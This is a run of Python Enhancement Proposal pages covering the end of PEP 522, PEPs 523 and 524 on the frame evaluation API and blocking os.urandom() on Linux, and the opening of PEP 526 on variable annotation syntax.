module), with os.urandom() and random.SystemRandom() instead raising
an exception when they detect that the underlying operating system call
would block.
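As an illustration of what calling code might look like under the behaviour
proposed here, the following sketch (hypothetical application code, not part
of this PEP; the helper name, retry interval and timeout are illustrative
assumptions) catches the proposed BlockingIOError and lets the caller decide
whether to keep waiting or abort:
import os
import sys
import time
def read_secret_bytes(num_bytes, retry_interval=1.0, timeout=30.0):
    # Assumes os.urandom() raises BlockingIOError when the system RNG is
    # not yet initialized, as this PEP proposes for Linux.
    deadline = time.monotonic() + timeout
    while True:
        try:
            return os.urandom(num_bytes)
        except BlockingIOError:
            if time.monotonic() > deadline:
                sys.exit("system RNG not initialized; giving up")
            time.sleep(retry_interval)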
References
[1]
os.urandom() should use Linux 3.17 getrandom() syscall
(http://bugs.python.org/issue22181)
[2]
Python 3.5 running on Linux kernel 3.17+ can block at startup or on
importing the random module on getrandom()
(http://bugs.python.org/issue26839)
[3]
“import random” blocks on entropy collection on Linux with low entropy
(http://bugs.python.org/issue25420)
[4]
os.urandom() doesn’t block on Linux anymore
(https://hg.python.org/cpython/rev/9de508dc4837)
[5]
Proposal to add os.getrandom()
(http://bugs.python.org/issue26839#msg267803)
[6]
Add os.urandom_block()
(http://bugs.python.org/issue27250)
[7]
Add random.cryptorandom() and random.pseudorandom, deprecate os.urandom()
(http://bugs.python.org/issue27279)
[8]
Always use getrandom() in os.urandom() on Linux and add
block=False parameter to os.urandom()
(http://bugs.python.org/issue27266)
[9]
Application level vs library level design decisions
(https://mail.python.org/pipermail/security-sig/2016-June/000057.html)
[10]
Does the HAVE_GETRANDOM_SYSCALL config setting make sense?
(https://mail.python.org/pipermail/security-sig/2016-June/000060.html)
[11]
Take a decision for os.urandom() in Python 3.6
(https://mail.python.org/pipermail/security-sig/2016-August/000084.htm)
For additional background details beyond those captured in this PEP and Victor’s
competing PEP, also see Victor’s prior collection of relevant information and
links at https://haypo-notes.readthedocs.io/summary_python_random_issue.html
Copyright
This document has been placed into the public domain.
| Rejected | PEP 522 – Allow BlockingIOError in security sensitive APIs | Standards Track | A number of APIs in the standard library that return random values nominally
suitable for use in security sensitive operations currently have an obscure
operating system dependent failure mode that allows them to return values that
are not, in fact, suitable for such operations. |
PEP 523 – Adding a frame evaluation API to CPython
Author:
Brett Cannon <brett at python.org>,
Dino Viehland <dinov at microsoft.com>
Status:
Final
Type:
Standards Track
Created:
16-May-2016
Python-Version:
3.6
Post-History:
16-May-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Proposal
Expanding PyCodeObject
Expanding PyInterpreterState
Changes to Python/ceval.c
Updating python-gdb.py
Performance impact
Example Usage
A JIT for CPython
Pyjion
Other JITs
Debugging
Implementation
Open Issues
Allow eval_frame to be NULL
Rejected Ideas
A JIT-specific C API
Is co_extra needed?
References
Copyright
Abstract
This PEP proposes to expand CPython’s C API [2] to allow for
the specification of a per-interpreter function pointer to handle the
evaluation of frames [5]. This proposal also
suggests adding a new field to code objects [3] to store
arbitrary data for use by the frame evaluation function.
Rationale
One place where flexibility has been lacking in Python is in the direct
execution of Python code. While CPython’s C API [2] allows for
constructing the data going into a frame object and then evaluating it
via PyEval_EvalFrameEx() [5], control over the
execution of Python code comes down to individual objects instead of a
holistic control of execution at the frame level.
While wanting to have influence over frame evaluation may seem a bit
too low-level, it does open the possibility for things such as a
method-level JIT to be introduced into CPython without CPython itself
having to provide one. By allowing external C code to control frame
evaluation, a JIT can participate in the execution of Python code at
the key point where evaluation occurs. This then allows for a JIT to
conditionally recompile Python bytecode to machine code as desired
while still allowing for executing regular CPython bytecode when
running the JIT is not desired. This can be accomplished by allowing
interpreters to specify what function to call to evaluate a frame. And
by placing the API at the frame evaluation level it allows for a
complete view of the execution environment of the code for the JIT.
This ability to specify a frame evaluation function also allows for
other use-cases beyond just opening CPython up to a JIT. For instance,
it would not be difficult to implement a tracing or profiling function
at the call level with this API. While CPython does provide the
ability to set a tracing or profiling function at the Python level,
this would be able to match the data collection of the profiler and
quite possibly be faster for tracing by simply skipping per-line
tracing support.
It also opens up the possibility of debugging where the frame
evaluation function only performs special debugging work when it
detects it is about to execute a specific code object. In that
instance the bytecode could be theoretically rewritten in-place to
inject a breakpoint function call at the proper point for help in
debugging while not having to do a heavy-handed approach as
required by sys.settrace().
To help facilitate these use-cases, we are also proposing the addition
of a “scratch space” on code objects via a new field. This will allow
per-code object data to be stored with the code object itself for easy
retrieval by the frame evaluation function as necessary. The field
itself will simply be a PyObject * type so that any data stored in
the field will participate in normal object memory management.
Proposal
None of the proposed C API changes below will be part of the stable ABI.
Expanding PyCodeObject
One field is to be added to the PyCodeObject struct
[3]:
typedef struct {
...
void *co_extra; /* "Scratch space" for the code object. */
} PyCodeObject;
The co_extra will be NULL by default and only filled in as
needed. Values stored in the field are expected to not be required
in order for the code object to function, allowing the loss of the
data of the field to be acceptable.
A private API has been introduced to work with the field:
PyAPI_FUNC(Py_ssize_t) _PyEval_RequestCodeExtraIndex(freefunc);
PyAPI_FUNC(int) _PyCode_GetExtra(PyObject *code, Py_ssize_t index,
void **extra);
PyAPI_FUNC(int) _PyCode_SetExtra(PyObject *code, Py_ssize_t index,
void *extra);
Users of the field are expected to call
_PyEval_RequestCodeExtraIndex() to receive (what should be
considered) an opaque index value for adding data to co_extra.
With that index, users can set data using _PyCode_SetExtra() and
later retrieve the data with _PyCode_GetExtra(). The API is
purposefully listed as private to communicate the fact that there are
no semantic guarantees of the API between Python releases.
Using a list or a tuple was considered, but both were found to be less
performant, and with a key use-case being JIT usage the performance
consideration won out in favour of a custom struct instead of a Python
object.
A dict was also considered, but once again performance was more
important. While a dict will have constant overhead in looking up
data, the overhead for the common case of a single object being stored
in the data structure leads to a tuple having better performance
characteristics (i.e. iterating a tuple of length 1 is faster than
the overhead of hashing and looking up an object in a dict).
Expanding PyInterpreterState
The entrypoint for the frame evaluation function is per-interpreter:
// Same type signature as PyEval_EvalFrameEx().
typedef PyObject* (*_PyFrameEvalFunction)(PyFrameObject*, int);
typedef struct {
...
_PyFrameEvalFunction eval_frame;
} PyInterpreterState;
By default, the eval_frame field will be initialized to a function
pointer that represents what PyEval_EvalFrameEx() currently is
(called _PyEval_EvalFrameDefault(), discussed later in this PEP).
Third-party code may then set their own frame evaluation function
instead to control the execution of Python code. A pointer comparison
can be used to detect if the field is set to
_PyEval_EvalFrameDefault() and thus has not been mutated yet.
Changes to Python/ceval.c
PyEval_EvalFrameEx() [5] as it currently stands
will be renamed to _PyEval_EvalFrameDefault(). The new
PyEval_EvalFrameEx() will then become:
PyObject *
PyEval_EvalFrameEx(PyFrameObject *frame, int throwflag)
{
PyThreadState *tstate = PyThreadState_GET();
return tstate->interp->eval_frame(frame, throwflag);
}
This allows third-party code to place itself directly in the path
of Python code execution while being backwards-compatible with code
already using the pre-existing C API.
Updating python-gdb.py
The generated python-gdb.py file used for Python support in GDB
makes some hard-coded assumptions about PyEval_EvalFrameEx(), e.g.
the names of local variables. It will need to be updated to work with
the proposed changes.
Performance impact
As this PEP is proposing an API to add pluggability, performance
impact is considered only in the case where no third-party code has
made any changes.
Several runs of pybench [14] consistently showed no performance
cost from the API change alone.
A run of the Python benchmark suite [9] showed no
measurable cost in performance.
In terms of memory impact, since there are typically not many CPython
interpreters executing in a single process that means the impact of
co_extra being added to PyCodeObject is the only worry.
According to [8], a run of the Python test suite
results in about 72,395 code objects being created. On a 64-bit
CPU that would result in 579,160 bytes of extra memory being used if
all code objects were alive at once and had nothing set in their
co_extra fields.
Example Usage
A JIT for CPython
Pyjion
The Pyjion project [1] has used this proposed API to implement
a JIT for CPython using the CoreCLR’s JIT [4]. Each code
object has its co_extra field set to a PyjionJittedCode object
which stores four pieces of information:
Execution count
A boolean representing whether a previous attempt to JIT failed
A function pointer to a trampoline (which can be type tracing or not)
A void pointer to any JIT-compiled machine code
The frame evaluation function has (roughly) the following algorithm:
def eval_frame(frame, throw_flag):
    pyjion_code = frame.code.co_extra
    if not pyjion_code:
        frame.code.co_extra = PyjionJittedCode()
    elif not pyjion_code.jit_failed:
        if not pyjion_code.jit_code:
            return pyjion_code.eval(pyjion_code.jit_code, frame)
        elif pyjion_code.exec_count > 20_000:
            if jit_compile(frame):
                return pyjion_code.eval(pyjion_code.jit_code, frame)
            else:
                pyjion_code.jit_failed = True
        pyjion_code.exec_count += 1
    return _PyEval_EvalFrameDefault(frame, throw_flag)
The key point, though, is that all of this work and logic is separate
from CPython and yet with the proposed API changes it is able to
provide a JIT that is compliant with Python semantics (as of this
writing, performance is almost equivalent to CPython without the new
API). This means there’s nothing technically preventing others from
implementing their own JITs for CPython by utilizing the proposed API.
Other JITs
It should be mentioned that the Pyston team was consulted on an
earlier version of this PEP that was more JIT-specific and they were
not interested in utilizing the changes proposed because they want
control over memory layout and had no interest in directly supporting
CPython itself. An informal discussion with a developer on the PyPy
team led to a similar comment.
Numba [6], on the other hand, suggested that they would be
interested in the proposed change in a post-1.0 future for
themselves [7].
The experimental Coconut JIT [13] could have benefitted from
this PEP. In private conversations with Coconut’s creator we were told
that our API was probably superior to the one they developed for
Coconut to add JIT support to CPython.
Debugging
In conversations with the Python Tools for Visual Studio team (PTVS)
[12], they thought they would find these API changes useful for
implementing more performant debugging. As mentioned in the Rationale
section, this API would allow for switching on debugging functionality
only in frames where it is needed. This could allow for either
skipping information that sys.settrace() normally provides and
even go as far as to dynamically rewrite bytecode prior to execution
to inject e.g. breakpoints in the bytecode.
It also turns out that Google provides a very similar API
internally. It has been used for performant debugging purposes.
Implementation
A set of patches implementing the proposed API is available through
the Pyjion project [1]. In its current form it has more
changes to CPython than just this proposed API, but that is for ease
of development instead of strict requirements to accomplish its goals.
Open Issues
Allow eval_frame to be NULL
Currently the frame evaluation function is expected to always be set.
It could very easily simply default to NULL instead which would
signal to use _PyEval_EvalFrameDefault(). The current proposal of
not special-casing the field seemed the most straightforward, but it
does require that the field not accidentally be cleared, else a crash
may occur.
Rejected Ideas
A JIT-specific C API
Originally this PEP was going to propose a much larger API change
which was more JIT-specific. After soliciting feedback from the Numba
team [6], though, it became clear that the API was unnecessarily
large. The realization was made that all that was truly needed was the
opportunity to provide a trampoline function to handle execution of
Python code that had been JIT-compiled and a way to attach that
compiled machine code along with other critical data to the
corresponding Python code object. Once it was shown that there was no
loss in functionality or in performance while minimizing the API
changes required, the proposal was changed to its current form.
Is co_extra needed?
While discussing this PEP at PyCon US 2016, some core developers
expressed their worry of the co_extra field making code objects
mutable. The thinking seemed to be that having a field that was
mutated after the creation of the code object made the object seem
mutable, even though no other aspect of code objects changed.
The view of this PEP is that the co_extra field doesn’t change the
fact that code objects are immutable. The field is specified in this
PEP to not contain information required to make the code object
usable, making it more of a caching field. It could be viewed as
similar to the UTF-8 cache that string objects have internally;
strings are still considered immutable even though they have a field
that is conditionally set.
Performance measurements were also made where the field was not
available for JIT workloads. The loss of the field was deemed too
costly to performance when using an unordered map from C++ or Python’s
dict to associate a code object with JIT-specific data objects.
References
[1] (1, 2)
Pyjion project
(https://github.com/microsoft/pyjion)
[2] (1, 2)
CPython’s C API
(https://docs.python.org/3/c-api/index.html)
[3] (1, 2)
PyCodeObject
(https://docs.python.org/3/c-api/code.html#c.PyCodeObject)
[4]
.NET Core Runtime (CoreCLR)
(https://github.com/dotnet/coreclr)
[5] (1, 2, 3)
PyEval_EvalFrameEx()
(https://docs.python.org/3/c-api/veryhigh.html?highlight=pyframeobject#c.PyEval_EvalFrameEx)
[6] (1, 2)
Numba
(http://numba.pydata.org/)
[7]
numba-users mailing list:
“Would the C API for a JIT entrypoint being proposed by Pyjion help out Numba?”
(https://groups.google.com/a/continuum.io/forum/#!topic/numba-users/yRl_0t8-m1g)
[8]
[Python-Dev] Opcode cache in ceval loop
(https://mail.python.org/pipermail/python-dev/2016-February/143025.html)
[9]
Python benchmark suite
(https://hg.python.org/benchmarks)
[10]
Pyston
(http://pyston.org)
[11]
PyPy
(http://pypy.org/)
[12]
Python Tools for Visual Studio
(http://microsoft.github.io/PTVS/)
[13]
Coconut
(https://github.com/davidmalcolm/coconut)
[14]
pybench
(https://hg.python.org/cpython/file/default/Tools/pybench)
Copyright
This document has been placed in the public domain.
| Final | PEP 523 – Adding a frame evaluation API to CPython | Standards Track | This PEP proposes to expand CPython’s C API [2] to allow for
the specification of a per-interpreter function pointer to handle the
evaluation of frames [5]. This proposal also
suggests adding a new field to code objects [3] to store
arbitrary data for use by the frame evaluation function. |
PEP 524 – Make os.urandom() blocking on Linux
Author:
Victor Stinner <vstinner at python.org>
Status:
Final
Type:
Standards Track
Created:
20-Jun-2016
Python-Version:
3.6
Table of Contents
Abstract
The bug
Original bug
Status in Python 3.5.2
Use Cases
Use Case 1: init script
Use case 1.1: No secret needed
Use case 1.2: Secure secret required
Use Case 2: Web server
Fix system urandom
Load entropy from disk at boot
Virtual machines
Embedded devices
Denial-of-service when reading random
Don’t use /dev/random but /dev/urandom
getrandom(size, 0) can block forever on Linux
Rationale
Changes
Make os.urandom() blocking on Linux
Add a new os.getrandom() function
Examples using os.getrandom()
Best-effort RNG
wait_for_system_rng()
Create a best-effort RNG
Alternative
Leave os.urandom() unchanged, add os.getrandom()
Raise BlockingIOError in os.urandom()
Proposition
Criticism
Add an optional block parameter to os.urandom()
Acceptance
Annexes
Operating system random functions
Why using os.urandom()?
Copyright
Abstract
Modify os.urandom() to block on Linux 3.17 and newer until the OS
urandom is initialized to increase the security.
Add also a new os.getrandom() function (for Linux and Solaris) to be
able to choose how to handle when os.urandom() is going to block on
Linux.
The bug
Original bug
Python 3.5.0 was enhanced to use the new getrandom() syscall
introduced in Linux 3.17 and Solaris 11.3. The problem is that users
started to complain that Python 3.5 blocks at startup on Linux in
virtual machines and embedded devices: see issues #25420 and #26839.
On Linux, getrandom(0) blocks until the kernel initialized urandom
with 128 bits of entropy. The issue #25420 describes a Linux build
platform blocking at import random. The issue #26839 describes a
short Python script from systemd-cron, used to compute an MD5 hash and
called very early in the init process. The system initialization blocks
on this script, which blocks on getrandom(0) to initialize Python.
The Python initialization requires random bytes to implement a
counter-measure against the hash denial-of-service (hash DoS), see:
Issue #13703: Hash collision security issue
PEP 456: Secure and interchangeable hash algorithm
Importing the random module creates an instance of
random.Random: random._inst. On Python 3.5, random.Random
constructor reads 2500 bytes from os.urandom() to seed a Mersenne
Twister RNG (random number generator).
Other platforms may be affected by this bug, but in practice, only Linux
systems use Python scripts to initialize the system.
Status in Python 3.5.2
Python 3.5.2 behaves like Python 2.7 and Python 3.4. If the system
urandom is not initialized, the startup does not block, but
os.urandom() can return low-quality entropy (even if it is not easily
guessable).
Use Cases
The following use cases are used to help to choose the right compromise
between security and practicability.
Use Case 1: init script
Use a Python 3 script to initialize the system, like systemd-cron. If
the script blocks, the system initialization is stuck too. The issue #26839
is a good example of this use case.
Use case 1.1: No secret needed
If the init script doesn’t have to generate any secure secret, this use
case is already handled correctly in Python 3.5.2: Python startup
doesn’t block on system urandom anymore.
Use case 1.2: Secure secret required
If the init script has to generate a secure secret, there is no safe
solution.
Falling back to weak entropy is not acceptable: it would
reduce the security of the program.
Python cannot produce secure entropy itself; it can only wait until the
system urandom is initialized. But in this use case, the whole system
initialization is blocked by this script, so the system fails to boot.
The real answer is that the system initialization must not be blocked by
such a script. It is ok to start the script very early at system
initialization, but the script may block for a few seconds until it is
able to generate the secret.
Reminder: in some cases, the initialization of the system urandom never
occurs and so programs waiting for the system urandom block forever.
Use Case 2: Web server
Run a Python 3 web server serving web pages using HTTP and HTTPS
protocols. The server is started as soon as possible.
The first target of the hash DoS attack was the web server: it’s important
that the hash secret cannot be easily guessed by an attacker.
If serving a web page needs a secret to create a cookie, create an
encryption key, …, the secret must be created with good entropy:
again, it must be hard to guess the secret.
A web server requires security. If a choice must be made between
security and running the server with weak entropy, security is more
important. If there is no good entropy, the server must block or fail
with an error.
The question is if it makes sense to start a web server on a host before
system urandom is initialized.
The issues #25420 and #26839 are restricted to the Python startup, not
to generate a secret before the system urandom is initialized.
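For example, a web application might derive a cookie-signing key once at
startup from os.urandom(); the sketch below is illustrative only (the helper
name and key size are assumptions, not part of this PEP):
import os
def make_cookie_signing_key(num_bytes=32):
    # Backed by the kernel CSPRNG; under this PEP the call would block on
    # Linux until the urandom pool is initialized, so the key is never
    # derived from weak entropy.
    return os.urandom(num_bytes)
COOKIE_SIGNING_KEY = make_cookie_signing_key()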
Fix system urandom
Load entropy from disk at boot
Collecting entropy can take up to several minutes. To accelerate the
system initialization, operating systems store entropy on disk at
shutdown, and then reload entropy from disk at the boot.
If a system collects enough entropy at least once, the system urandom
will be initialized quickly, as soon as the entropy is reloaded from
disk.
Virtual machines
Virtual machines don’t have direct access to the hardware and so have
fewer sources of entropy than bare metal. A solution is to add a
virtio-rng device to pass entropy
from the host to the virtual machine.
Embedded devices
A solution for embedded devices is to plug in a hardware RNG.
For example, the Raspberry Pi has a hardware RNG, but it’s not used by
default. See: Hardware RNG on Raspberry Pi.
Denial-of-service when reading random
Don’t use /dev/random but /dev/urandom
The /dev/random device should only be used for very specific use cases.
Reading from /dev/random on Linux is likely to block. Users don’t
like when an application blocks for longer than 5 seconds to generate a
secret. Blocking is only expected for specific cases like explicitly
generating an encryption key.
When the system has no available entropy, choosing between blocking
until entropy is available or falling back on lower quality entropy is a
matter of compromise between security and practicability. The choice
depends on the use case.
On Linux, /dev/urandom is secure, it should be used instead of
/dev/random. See Myths about /dev/urandom by Thomas Hühn: “Fact:
/dev/urandom is the preferred source of cryptographic randomness on
UNIX-like systems”
getrandom(size, 0) can block forever on Linux
The origin of the Python issue #26839 is the Debian bug
report #822431: in fact,
getrandom(size, 0) blocks forever on the virtual machine. The system
only succeeded in booting because systemd killed the blocked process after
90 seconds.
Solutions like Load entropy from disk at boot reduce the risk of
this bug.
Rationale
On Linux, reading /dev/urandom can return “weak” entropy before
urandom is fully initialized, i.e. before the kernel has collected 128 bits
of entropy. Linux 3.17 adds a new getrandom() syscall which makes it
possible to block until urandom is initialized.
On Python 3.5.2, os.urandom() uses the
getrandom(size, GRND_NONBLOCK), but falls back on reading the
non-blocking /dev/urandom if getrandom(size, GRND_NONBLOCK)
fails with EAGAIN.
Security experts promote os.urandom() for generating cryptographic
keys because it is implemented with a cryptographically secure
pseudo-random number generator (CSPRNG).
By the way, os.urandom() is preferred over ssl.RAND_bytes() for
different reasons.
This PEP proposes to modify os.urandom() to use getrandom() in
blocking mode to not return weak entropy, but also ensure that Python
will not block at startup.
Changes
Make os.urandom() blocking on Linux
All changes described in this section are specific to the Linux
platform.
Changes:
Modify os.urandom() to block until system urandom is initialized:
os.urandom() (C function _PyOS_URandom()) is modified to
always call getrandom(size, 0) (blocking mode) on Linux and
Solaris.
Add a new private _PyOS_URandom_Nonblocking() function: try to
call getrandom(size, GRND_NONBLOCK) on Linux and Solaris, but
falls back on reading /dev/urandom if it fails with EAGAIN.
Initialize hash secret from non-blocking system urandom:
_PyRandom_Init() is modified to call
_PyOS_URandom_Nonblocking().
random.Random constructor now uses non-blocking system urandom: it
is modified to use internally the new _PyOS_URandom_Nonblocking()
function to seed the RNG.
Add a new os.getrandom() function
A new os.getrandom(size, flags=0) function is added: use
getrandom() syscall on Linux and getrandom() C function on
Solaris.
The function comes with 2 new flags:
os.GRND_RANDOM: read bytes from /dev/random rather than
reading /dev/urandom
os.GRND_NONBLOCK: raise a BlockingIOError if os.getrandom()
would block
The os.getrandom() function is a thin wrapper around the getrandom()
syscall/C function and so inherits its behaviour. For example, on
Linux, it can return fewer bytes than requested if the syscall is
interrupted by a signal.
Examples using os.getrandom()
Best-effort RNG
Example of a portable non-blocking RNG function: try to get random bytes
from the OS urandom, or fallback on the random module.
def best_effort_rng(size):
    # getrandom() is only available on Linux and Solaris
    if not hasattr(os, 'getrandom'):
        return os.urandom(size)
    result = bytearray()
    try:
        # need a loop because getrandom() can return less bytes than
        # requested for different reasons
        while size:
            data = os.getrandom(size, os.GRND_NONBLOCK)
            result += data
            size -= len(data)
    except BlockingIOError:
        # OS urandom is not initialized yet:
        # fallback on the Python random module
        data = bytes(random.randrange(256) for byte in range(size))
        result += data
    return bytes(result)
This function can block in theory on a platform where
os.getrandom() is not available but os.urandom() can block.
wait_for_system_rng()
Example of function waiting timeout seconds until the OS urandom is
initialized on Linux or Solaris:
def wait_for_system_rng(timeout, interval=1.0):
    if not hasattr(os, 'getrandom'):
        return
    deadline = time.monotonic() + timeout
    while True:
        try:
            os.getrandom(1, os.GRND_NONBLOCK)
        except BlockingIOError:
            pass
        else:
            return
        if time.monotonic() > deadline:
            raise Exception('OS urandom not initialized after %s seconds'
                            % timeout)
        time.sleep(interval)
This function is not portable. For example, os.urandom() can block
on FreeBSD in theory, at the early stage of the system initialization.
Create a best-effort RNG
Simpler example to create a non-blocking RNG on Linux: choose between
Random.SystemRandom and Random.Random depending if
getrandom(size) would block.
def create_nonblocking_random():
    if not hasattr(os, 'getrandom'):
        return random.Random()
    try:
        os.getrandom(1, os.GRND_NONBLOCK)
    except BlockingIOError:
        return random.Random()
    else:
        return random.SystemRandom()
This function is not portable. For example, random.SystemRandom
can block on FreeBSD in theory, at the early stage of the system
initialization.
Alternative
Leave os.urandom() unchanged, add os.getrandom()
os.urandom() remains unchanged: never block, but it can return weak
entropy if system urandom is not initialized yet.
Only add the new os.getrandom() function (wrapper to the
getrandom() syscall/C function).
The secrets.token_bytes() function should be used to write portable
code.
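A minimal sketch of such portable code (secrets was added by PEP 506 and is
available from Python 3.6; the variable names are illustrative only):
import secrets
# secrets delegates to the best OS entropy source available, so callers
# do not need to know about getrandom() or /dev/urandom.
session_token = secrets.token_bytes(16)
csrf_token = secrets.token_urlsafe(32)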
The problem with this change is that it expects users to understand
security well and to know each platform well. Python has the tradition of
hiding “implementation details”. For example, os.urandom() is not a
thin wrapper to the /dev/urandom device: it uses
CryptGenRandom() on Windows, it uses getentropy() on OpenBSD, it
tries getrandom() on Linux and Solaris or falls back on reading
/dev/urandom. Python already uses the best available system RNG
depending on the platform.
This PEP does not change the API:
os.urandom(), random.SystemRandom and secrets for security
random module (except random.SystemRandom) for all other usages
Raise BlockingIOError in os.urandom()
Proposition
PEP 522: Allow BlockingIOError in security sensitive APIs on Linux.
Python should not decide for the developer how to handle The bug:
raising a BlockingIOError immediately if os.urandom() is going to
block allows developers to choose how to handle this case:
catch the exception and fall back to a non-secure entropy source:
read /dev/urandom on Linux, use the Python random module
(which is not secure at all), use time, use the process identifier, etc.
don’t catch the error, the whole program fails with this fatal
exception
More generally, the exception helps to notify when something goes wrong.
The application can emit a warning when it starts to wait for
os.urandom().
Criticism
For the use case 2 (web server), falling back on non-secure entropy is
not acceptable. The application must handle BlockingIOError: poll
os.urandom() until it completes. Example:
def secret(n=16):
    try:
        return os.urandom(n)
    except BlockingIOError:
        pass
    print("Wait for system urandom initialization: move your "
          "mouse, use your keyboard, use your disk, ...")
    while 1:
        # Avoid busy-loop: sleep 1 ms
        time.sleep(0.001)
        try:
            return os.urandom(n)
        except BlockingIOError:
            pass
For correctness, all applications which must generate a secure secret
must be modified to handle BlockingIOError even if The bug is
unlikely.
The case of applications which use os.urandom() but don’t really require
security is not well defined. Maybe these applications should not use
os.urandom() in the first place, but always the non-blocking
random module. If os.urandom() is used for security, we are back
to the use case 2 described above: Use Case 2: Web server. If a
developer doesn’t want to drop os.urandom(), the code should be
modified. Example:
def almost_secret(n=16):
    try:
        return os.urandom(n)
    except BlockingIOError:
        return bytes(random.randrange(256) for byte in range(n))
The question is if The bug is common enough to require that so many
applications have to be modified.
Another simpler choice is to refuse to start before the system urandom
is initialized:
def secret(n=16):
    try:
        return os.urandom(n)
    except BlockingIOError:
        print("Fatal error: the system urandom is not initialized")
        print("Wait a bit, and rerun the program later.")
        sys.exit(1)
Compared to Python 2.7, Python 3.4 and Python 3.5.2, where os.urandom()
never blocks nor raises an exception on Linux, such a behaviour change can
be seen as a major regression.
Add an optional block parameter to os.urandom()
See the issue #27250: Add os.urandom_block().
Add an optional block parameter to os.urandom(). The default value may
be True (block by default) or False (non-blocking).
The first technical issue is to implement os.urandom(block=False) on
all platforms. Only Linux 3.17 (and newer) and Solaris 11.3 (and newer)
have a well defined non-blocking API (getrandom(size,
GRND_NONBLOCK)).
As with Raise BlockingIOError in os.urandom(), it doesn’t seem worth it to
make the API more complex for a theoretical (or at least very rare) use
case.
As with Leave os.urandom() unchanged, add os.getrandom(), the problem is
that it makes the API more complex and so more error-prone.
Acceptance
The PEP was accepted on 2016-08-08 by Guido van Rossum.
Annexes
Operating system random functions
os.urandom() uses the following functions:
OpenBSD: getentropy()
(OpenBSD 5.6)
Linux: getrandom() (Linux 3.17)
– see also A system call for random numbers: getrandom()
Solaris: getentropy(),
getrandom()
(both need Solaris 11.3)
UNIX, BSD: /dev/urandom, /dev/random
Windows: CryptGenRandom()
(Windows XP)
On Linux, commands to get the status of /dev/random (results are
number of bytes):
$ cat /proc/sys/kernel/random/entropy_avail
2850
$ cat /proc/sys/kernel/random/poolsize
4096
Why using os.urandom()?
Since os.urandom() is implemented in the kernel, it doesn’t have the
issues of a user-space RNG. For example, it is much harder to get its
state. It is usually built on a CSPRNG, so even if its state is
“stolen”, it is hard to compute previously generated numbers. The kernel
has good knowledge of entropy sources and feeds the entropy pool
regularly.
That’s also why os.urandom() is preferred over ssl.RAND_bytes().
Copyright
This document has been placed in the public domain.
| Final | PEP 524 – Make os.urandom() blocking on Linux | Standards Track | Modify os.urandom() to block on Linux 3.17 and newer until the OS
urandom is initialized to increase the security. |
PEP 526 – Syntax for Variable Annotations
Author:
Ryan Gonzalez <rymg19 at gmail.com>, Philip House <phouse512 at gmail.com>, Ivan Levkivskyi <levkivskyi at gmail.com>, Lisa Roach <lisaroach14 at gmail.com>, Guido van Rossum <guido at python.org>
Status:
Final
Type:
Standards Track
Topic:
Typing
Created:
09-Aug-2016
Python-Version:
3.6
Post-History:
30-Aug-2016, 02-Sep-2016
Resolution:
Python-Dev message
Table of Contents
Status
Notice for Reviewers
Abstract
Rationale
Non-goals
Specification
Global and local variable annotations
Class and instance variable annotations
Annotating expressions
Where annotations aren’t allowed
Variable annotations in stub files
Preferred coding style for variable annotations
Changes to Standard Library and Documentation
Runtime Effects of Type Annotations
Other uses of annotations
Rejected/Postponed Proposals
Backwards Compatibility
Implementation
Copyright
Status
This PEP has been provisionally accepted by the BDFL.
See the acceptance message for more color:
https://mail.python.org/pipermail/python-dev/2016-September/146282.html
Notice for Reviewers
This PEP was drafted in a separate repo:
https://github.com/phouse512/peps/tree/pep-0526.
There was preliminary discussion on python-ideas and at
https://github.com/python/typing/issues/258.
Before you bring up an objection in a public forum please at least
read the summary of rejected ideas listed at the end of this PEP.
Abstract
PEP 484 introduced type hints, a.k.a. type annotations. While its
main focus was function annotations, it also introduced the notion of
type comments to annotate variables:
# 'primes' is a list of integers
primes = [] # type: List[int]
# 'captain' is a string (Note: initial value is a problem)
captain = ... # type: str
class Starship:
# 'stats' is a class variable
stats = {} # type: Dict[str, int]
This PEP aims at adding syntax to Python for annotating the types of variables
(including class variables and instance variables),
instead of expressing them through comments:
primes: List[int] = []
captain: str # Note: no initial value!
class Starship:
stats: ClassVar[Dict[str, int]] = {}
PEP 484 explicitly states that type comments are intended to help with
type inference in complex cases, and this PEP does not change this
intention. However, since in practice type comments have also been
adopted for class variables and instance variables, this PEP also
discusses the use of type annotations for those variables.
Rationale
Although type comments work well enough, the fact that they’re
expressed through comments has some downsides:
Text editors often highlight comments differently from type annotations.
There’s no way to annotate the type of an undefined variable; one needs to
initialize it to None (e.g. a = None # type: int).
Variables annotated in a conditional branch are difficult to read:
if some_value:
    my_var = function()  # type: Logger
else:
    my_var = another_function()  # Why isn't there a type here?
Since type comments aren’t actually part of the language, if a Python script
wants to parse them, it requires a custom parser instead of just using
ast.
Type comments are used a lot in typeshed. Migrating typeshed to use
the variable annotation syntax instead of type comments would improve
readability of stubs.
In situations where normal comments and type comments are used together, it is
difficult to distinguish them:
path = None  # type: Optional[str]  # Path to module source
It’s impossible to retrieve the annotations at runtime outside of
attempting to find the module’s source code and parse it at runtime,
which is inelegant, to say the least.
The majority of these issues can be alleviated by making the syntax
a core part of the language. Moreover, having a dedicated annotation syntax
for class and instance variables (in addition to method annotations) will
pave the way to static duck-typing as a complement to nominal typing defined
by PEP 484.
Non-goals
While the proposal is accompanied by an extension of the typing.get_type_hints
standard library function for runtime retrieval of annotations, variable
annotations are not designed for runtime type checking. Third party packages
will have to be developed to implement such functionality.
It should also be emphasized that Python will remain a dynamically typed
language, and the authors have no desire to ever make type hints mandatory,
even by convention. Type annotations should not be confused with variable
declarations in statically typed languages. The goal of annotation syntax is
to provide an easy way to specify structured type metadata
for third party tools.
This PEP does not require type checkers to change their type checking
rules. It merely provides a more readable syntax to replace type
comments.
Specification
Type annotation can be added to an assignment statement or to a single
expression indicating the desired type of the annotation target to a third
party type checker:
my_var: int
my_var = 5 # Passes type check.
other_var: int = 'a' # Flagged as error by type checker,
# but OK at runtime.
This syntax does not introduce any new semantics beyond PEP 484, so that
the following three statements are equivalent:
var = value # type: annotation
var: annotation; var = value
var: annotation = value
Below we specify the syntax of type annotations
in different contexts and their runtime effects.
We also suggest how type checkers might interpret annotations, but
compliance to these suggestions is not mandatory. (This is in line
with the attitude towards compliance in PEP 484.)
Global and local variable annotations
The types of locals and globals can be annotated as follows:
some_number: int # variable without initial value
some_list: List[int] = [] # variable with initial value
Being able to omit the initial value allows for easier typing of variables
assigned in conditional branches:
sane_world: bool
if 2+2 == 4:
sane_world = True
else:
sane_world = False
Note that, although the syntax does allow tuple packing, it does not allow
one to annotate the types of variables when tuple unpacking is used:
# Tuple packing with variable annotation syntax
t: Tuple[int, ...] = (1, 2, 3)
# or
